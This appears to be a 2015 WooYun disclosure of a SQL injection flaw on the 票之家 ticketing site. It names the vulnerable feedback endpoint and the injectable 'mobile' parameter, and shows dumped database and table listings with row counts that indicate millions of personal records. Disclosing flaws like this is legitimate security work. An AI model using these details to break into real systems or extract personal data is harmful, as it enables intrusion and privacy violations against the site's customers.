当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138690

漏洞标题:票之家主站sql注入漏洞可泄漏数百万身份证/订单/手机号/姓名等

相关厂商:票之家

漏洞作者: 撸撸侠

提交时间:2015-09-02 20:50

修复时间:2015-10-17 20:52

公开时间:2015-10-17 20:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

票之家主站sql注入漏洞可泄漏数百万身份证/订单/手机号/姓名等

详细说明:

http://www.piaozhijia.cn:80/feedback/queryFeedbackList
data:mobile=angelina

漏洞证明:

available databases [6]:
[*] information_schema
[*] pzj_flight
[*] pzj_hotel
[*] pzj_ticket
[*] pzj_tools
[*] test


Database: pzj_ticket
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| tbl_data_check_record        | 5568222 |
| tbl_data_check_record_2      | 2244036 |
| tbl_data_equipment_detail    | 1797302 |
| tbl_biz_ticket               | 1370044 |
| tbl_data_system_log          | 681329  |
| tbl_biz_flow                 | 347417  |
| tbl_biz_orders               | 300111  |
| tbl_biz_flow_copy            | 250294  |
| tbl_data_operate_log         | 240067  |
| tbl_biz_guide_orders         | 204249  |
| tbl_data_bill_record         | 147784  |
| om_order                     | 140907  |
| tbl_biz_ticket_detail        | 94553   |
| tbl_biz_trading_record       | 27339   |
| tbl_biz_orders_redun         | 20770   |
| tbl_biz_flow_bak             | 20018   |
| tbl_data_his_query           | 16412   |
| tbl_app_account              | 15038   |
| tbl_biz_account              | 14783   |
| tbl_biz_bank                 | 14655   |
| login_log                    | 14264   |
| tbl_data_guide               | 13441   |
| tbl_data_theater_water       | 12934   |
| tbl_data_sign_contract       | 7690    |
| tbl_data_product_sale        | 5248    |
| tbl_app_account_role         | 3222    |
| tbl_data_reseller            | 2967    |
| tbl_biz_ticket_appoint       | 2219    |
| tbl_biz_orders_voucher       | 1974    |
| tbl_data_free_voucher        | 1890    |
| tbl_biz_order_notice         | 1747    |
| tbl_data_open_product        | 1159    |
| tbl_data_water_consumption   | 1135    |
| tbl_data_equipment_bind      | 968     |
| tbl_biz_ticket_finger        | 967     |
| tbl_app_website              | 950     |
| tbl_app_account_navigation   | 908     |
| tbl_data_price_basic         | 792     |
| tbl_biz_account_check        | 695     |
| tbl_data_product_child       | 667     |
| tbl_biz_orders_refund        | 625     |
| tbl_data_product             | 607     |
| tbl_biz_flow_check           | 567     |
| tbl_data_account_position    | 478     |
| tbl_data_reseller_partner    | 341     |
| tbl_biz_flow_bak1            | 318     |
| tbl_data_equipment           | 246     |
| tbl_data_order_remarks       | 239     |
| tbl_data_protocol_unit       | 215     |
| tbl_data_price_auth          | 207     |
| tbl_biz_payrecord            | 205     |
| tbl_data_standard            | 161     |
| tbl_data_settle_tx_log       | 152     |
| tbl_data_supplier_scene      | 150     |
| tbl_app_role_menu            | 140     |
| tbl_data_position_equipment  | 129     |
| fh_role_menu                 | 124     |
| tbl_app_menu_function        | 96      |
| fh_menu_function             | 92      |
| tbl_data_system_auditlog     | 90      |
| tbl_biz_flow_0811            | 83      |
| tbl_data_supplier            | 82      |
| fh_role_menu_old             | 79      |
| tbl_data_scene               | 78      |
| tbl_biz_print_record         | 74      |
| fh_menu_function_copy        | 72      |
| tbl_app_permission_resources | 70      |
| tbl_data_objwd               | 70      |
| tbl_data_position            | 68      |
| tbl_biz_subsidie_setting     | 67      |
| tbl_data_rebate_rule         | 61      |
| party_reseller               | 58      |
| tbl_data_guide_work          | 52      |
| fh_menu_function_old         | 47      |
| tbl_biz_taobao_serialnum     | 47      |
| tbl_data_id_builder          | 44      |
| tbl_data_supplier_contract   | 44      |
| help_context                 | 40      |
| tbl_data_rebate_conditions   | 39      |
| tbl_data_special_voucher     | 36      |
| tbl_app_menu_category        | 35      |
| tbl_data_from_type           | 29      |
| om_schedule                  | 27      |
| tbl_data_id_generator        | 25      |
| om_feedback                  | 23      |
| tbl_biz_contacts             | 20      |
| tbl_data_fh_scene_id         | 18      |
| fh_menu_category             | 17      |
| fh_menu_category_old         | 16      |
| tbl_biz_authorize_seller     | 16      |
| tbl_biz_account_flow         | 12      |
| tbl_data_verification        | 12      |
| tbl_biz_coupon_water         | 11      |
| tbl_data_product_appoint     | 10      |
| tbl_app_role                 | 8       |
| tbl_data_show_chart          | 6       |
| om_address                   | 5       |
| sys_cms                      | 5       |
| tbl_data_reseller_guide      | 5       |
| om_order_bak                 | 4       |
| pzj_news                     | 4       |
| tbl_app_navigation           | 4       |
| tbl_biz_orders_bak           | 4       |
| tbl_biz_ticket_bak           | 4       |
| tbl_biz_trading_record_bak   | 4       |
| help_tree                    | 3       |
| tbl_biz_taobao               | 3       |
| tbl_data_store_auth          | 3       |
| tbl_data_reseller_link       | 2       |
| tbl_data_show_screening      | 2       |
| tbl_appapi_feedback          | 1       |
| tbl_data_screening           | 1       |
+------------------------------+---------+


屏幕快照 2015-09-02 下午8.43.39.png

修复方案:

版权声明:转载请注明来源 撸撸侠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)